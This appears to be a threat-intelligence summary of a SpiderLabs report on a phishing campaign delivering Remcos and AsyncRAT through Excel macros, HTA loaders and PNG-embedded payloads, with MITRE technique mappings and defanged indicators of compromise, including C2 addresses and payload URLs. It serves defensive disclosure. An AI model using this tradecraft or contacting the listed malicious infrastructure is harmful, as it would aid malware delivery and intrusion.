AsyncRAT and Remcos Delivered in Multi-Stage Phishing Campaign

AsyncRAT and Remcos Delivered in Multi-Stage Phishing Campaign
LevelBlue SpiderLabs tracked a global phishing campaign using malicious Excel attachments to deliver multi-stage payloads that ultimately deployed Remcos and AsyncRAT. The operators used heavy obfuscation, disposable infrastructure, and themed HTA filenames to hide activity across multiple industries and countries. #Remcos #AsyncRAT #CloudflareWorkers #workersdev

Keypoints

  • LevelBlue SpiderLabs observed an active phishing campaign distributing malicious Excel spreadsheet attachments over a two-week period.
  • The campaign expanded from a limited phishing attempt into a widespread operation affecting organizations in manufacturing, media, professional services, agriculture, and chemicals.
  • Victims were globally distributed across Europe, the Asia-Pacific region, and the Americas, with emails seen in English, Polish, Chinese, and Thai.
  • The infection chain used multiple stages: malicious spreadsheet macro, HTA loader, script execution, and final payload delivery.
  • The campaign delivered Remcos and AsyncRAT, and may also have distributed FormBook and Lumma.
  • Attackers used obfuscation methods including URL shorteners, padded HTA files, Base64 encoding, PNG-embedded payloads, and Cloudflare Workers infrastructure.
  • The operators used unusual positive-sounding HTA filenames and rotating infrastructure, suggesting automation and high-volume campaign generation.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Malicious emails delivered weaponized spreadsheet attachments to targeted staff (‘phishing emails deliver weaponized .xls files’).
  • [T1204.002] User Execution: Malicious File – The victim had to open the spreadsheet and enable macros to start the infection chain (‘opens .xls attachment and enables macros’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Embedded VBA in the Excel droppers fetched the HTA payload (‘Embedded VBA macros in .xls droppers fetch and launch the HTA second stage’).
  • [T1218.005] System Binary Proxy Execution: Mshta – HTA files were executed through mshta.exe to run the next stage (‘HTA files executed via mshta.exe’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA payload contained JavaScript used for staging and retrieving payloads (‘HTA payloads contain JavaScript responsible for staging and payload retrieval’).
  • [T1102] Web Service – The attack used web services for geolocation lookup and staged content retrieval (‘query geoplugin[.]net for victim geolocation’).
  • [T1071.001] Application Layer Protocol: Web Protocols – HTTP/HTTPS supported downloads, redirects, and C2 communication (‘HTTP/HTTPS used for HTA download, PNG stager retrieval, URL shortener redirects’).
  • [T1027] Obfuscated Files or Information – The attackers concealed payloads using padding, Base64, decoy strings, and PNG steganography (‘PNG files used for steganography’).
  • [T1497] Virtualization/Sandbox Evasion – The samples used environment checks and anti-analysis behavior (‘geolocation-based execution gating; long sleep intervals and anti-debug tags’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Remcos configurations enabled Run key persistence (‘enable HKCU and HKLM Run key persistence’).
  • [T1056.001] Input Capture: Keylogging – Remcos and AsyncRAT were observed enabling keylogging (‘observed enabling keylogging’).
  • [T1573] Encrypted Channel – Remcos C2 traffic used encrypted communications (‘RC4-encrypted communications with TLS certificate material’).

Indicators of Compromise

  • [SHA256] Analyzed malicious spreadsheet attachment delivering AsyncRAT – 49c7b4eb6620917ee7ca796472b7af9f01ea6f7f80391ae7eb7bd8dabe0b7249
  • [URL] URL shorteners used to redirect to HTA payloads – https://cuth[.]me/sse8kU, https://masuk[.]to/FdpxBG
  • [URL] Obfuscated payload retrieval and hosted stages – https://as[.]al/file/KBn1RC, http://107.172.235[.]213/87/img_015059.png
  • [URL] Remcos and AsyncRAT payload hosting – http://107.172.135[.]60/96/ibredgoodforbestthingscomingbackform.hta, hxxp://198.12.83[.]75/98/img_194618.png
  • [IP] Remcos C2 infrastructure – 173.231.188[.]244:14641, 192.227.219[.]79:4550
  • [Domain] Remcos command-and-control domain – ffgfgjjddsgtrddhtjyfdsessxdssdfdfdfghfhg.duckdns[.]org:14647
  • [Hostname] Cloudflare Workers hosts used for multiple payloads – icy-lab-0431.guilherme-telecomunicacoes2024.workers[.]dev, dawn-bush-ddd1.yasminanthonyy.workers[.]dev
  • [Hostname] Additional Cloudflare Workers host observed in the campaign – small-morning-8be0.fsocietyandtools.workers[.]dev


Read more: https://www.levelblue.com/blogs/spiderlabs-blog/asyncrat-and-remcos-delivered-in-multi-stage-phishing-campaign